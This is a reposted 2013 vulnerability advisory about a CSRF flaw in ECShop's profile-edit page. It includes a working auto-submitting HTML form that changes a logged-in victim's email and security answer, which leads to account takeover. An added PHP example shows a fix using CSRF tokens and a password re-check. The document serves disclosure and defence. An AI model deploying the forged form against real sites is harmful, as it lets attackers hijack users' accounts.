CSRF exploitation of the "ECShop modify any user's password" vulnerability - vulnerability warning - Black Bar Safety Net

ID MYHACK58:62201337396
Type myhack58
Reporter Anonymous
Modified 2013-02-19T00:00:00


Brief description:

ECShop has a flaw in the design of its authentication mechanism that lets a malicious user steal another user's password. The attack can be carried out through XSS or CSRF.

Demo: http://www.tick.org/bugs.php?action=view&id=395

Detailed description:

Both CSRF and XSS can be used to get past the "obstacle" the vendor described. Someone has already described the XSS version; this report gives the CSRF version.

Vulnerability proof:

<html>
<body>
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
</form>
</body>
<script> document.forms[0].submit(); </script>
</html>

Build a web page like the one above. When a user who is logged in visits the page, that user's email address and some other security information are lost.

Repair solutions:

You know
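
One way to close this hole, shown as an added example (not ECShop's code and not part of the original report): require a per-session CSRF token on the profile-edit request, and ask for the current password again before the password-recovery fields are changed. The function names, the `csrf_token` and `current_password` fields, and the use of `password_hash()` storage are assumptions made for illustration.

```php
<?php
// Added example: hypothetical hardening for a profile-edit handler such as
// user.php with act=act_edit_profile. Function names are illustrative, not ECShop's.

// Issue one random token per session; embed it in the profile form as a hidden field.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Decide whether a POSTed profile change may be applied.
// $storedHash is the logged-in user's password hash (password_hash() format assumed).
function may_edit_profile(array $session, array $post, string $storedHash): array
{
    // 1. The request must carry the session's token; a cross-site form cannot read it.
    $sent = $post['csrf_token'] ?? '';
    if (!is_string($sent) || empty($session['csrf_token'])
        || !hash_equals($session['csrf_token'], $sent)) {
        return [false, 'missing or wrong CSRF token'];
    }
    // 2. Fields that feed password recovery need the current password again, so a
    //    request made without knowing the password cannot change them.
    $sensitive = ['email', 'sel_question', 'passwd_answer'];
    if (array_intersect($sensitive, array_keys($post))) {
        $current = $post['current_password'] ?? '';
        if (!is_string($current) || !password_verify($current, $storedHash)) {
            return [false, 'current password required'];
        }
    }
    return [true, 'ok'];
}

// Constructed demo data: a session, and the same fields as the form in the proof above.
$session = [];
$token   = csrf_token($session);
$hash    = password_hash('correct horse', PASSWORD_DEFAULT);
$forged  = ['email' => 'hack@wooyun.org', 'act' => 'act_edit_profile',
            'sel_question' => 'ecshop', 'passwd_answer' => 'exploit'];
$genuine = $forged + ['csrf_token' => $token, 'current_password' => 'correct horse'];

var_dump(may_edit_profile($session, $forged, $hash)[0]);   // cross-site request
var_dump(may_edit_profile($session, $genuine, $hash)[0]);  // user's own request
```

The token check stops the cross-site form; the password re-check also covers the XSS variant, where injected script could read the token from the page.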